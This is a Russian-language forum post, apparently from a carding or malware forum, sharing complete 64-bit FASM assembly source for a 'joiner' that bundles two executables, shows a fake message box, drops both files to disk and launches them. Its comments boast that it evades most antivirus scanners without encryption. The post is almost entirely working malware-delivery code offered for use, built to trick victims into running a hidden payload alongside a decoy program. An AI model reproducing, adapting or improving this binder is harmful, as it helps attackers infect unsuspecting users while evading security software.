1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

[ASM] Joyner fasm

Тема в разделе "Исходные коды", создана пользователем Talimidiusnx, 9 дек 2012.

  1. TopicStarter Overlay
    Talimidiusnx

    Talimidiusnx Гость

    Вот код "Джойнер" в сборе (FASM)
    Читайте комментарии в начале кода и редактировать при необходимости.

    Код:
    format PE64 GUI 5.0
    entry start
    include 'win64a.inc'
    ;-------------------------------------------------------------
    ;64-Bit 2 File Binder Sample
    ;shrooms|opensc.ws
    ;There is not much change from 32 to 64 bit.
    ;I don't know fasm that well and im sure theres
    ;something wrong with this code, even if it's minor
    ;like the create_new flag. This is just a simple
    ;test I made in fasm. I haven't really checked
    ;out fasm before, but I do notice their macros
    ;take care of the calling/register handling w/much 
    ;ease for 64 bit. 
    ;
    ;
    ;To make it work: edit your settings below , remove
    ;msgbox if you like, files must be in same dir when
    ;compiling. this technically does not have a builder.
    ;you have to compile with fasm to bind files.
    ;
    ;This scanned 1/34 on AV, not bad considering no encryption.
    ;-------------------------------------------------------------
    lpfilename1 equ  'f.exe'  ; 1st file name
    lpfilename2 equ  'x.exe'    ; 2nd file name
    ;SleepDelay equ 30000  ;Delay in Milliseconds
    ;-------------------------------------------------------------
    section '.text' code readable executable
      start:
            sub    rsp,40
            invoke MessageBox,0,szString1,szString2,+MB_OK+MB_ICONINFORMATION
            invoke CreateFile,file1name, GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE,0, CREATE_NEW, 0, 0
            mov ebx, file1start
            push rax
            invoke WriteFile,rax,ebx, file1end - file1start,lpRet, 0
            pop rax
            invoke CloseHandle, rax
            invoke CreateFile,file2name, GENERIC_WRITE, FILE_SHARE_READ Or FILE_SHARE_WRITE,0, CREATE_NEW, 0, 0
            mov ebx, file2start
            push rax
            invoke WriteFile,rax,ebx, file2end - file2start,lpRet, 0
            pop rax
            invoke CloseHandle, rax
            invoke ShellExecute, 0, 0, file1name, 0, 0, SW_SHOW
            invoke ShellExecute, 0, 0, file2name, 0, 0, SW_SHOW
            invoke ExitProcess,rax
            ret
    file1start:
    file lpfilename1 
    file1end:
    file2start:
    file lpfilename2
    file2end:
     
    section '.data' data readable writeable
      szString1 db "Fake message test",0
      szString2 db "Info",0
      file1name db lpfilename1,0
      file2name db lpfilename2,0
      lpRet dq 0
    section '.idata' import data readable writeable
      library kernel32,'KERNEL32.DLL',\
          user32,'USER32.DLL',\
          shell32, 'shell32.dll'
      include 'api\kernel32.inc'
      include 'api\user32.inc'
    import shell32,\
          ShellExecute, "ShellExecuteA"  
    С уважением, Talimidiusnx
     
    • Like Like x 2
    Метки:

Поделиться этой страницей

Загрузка...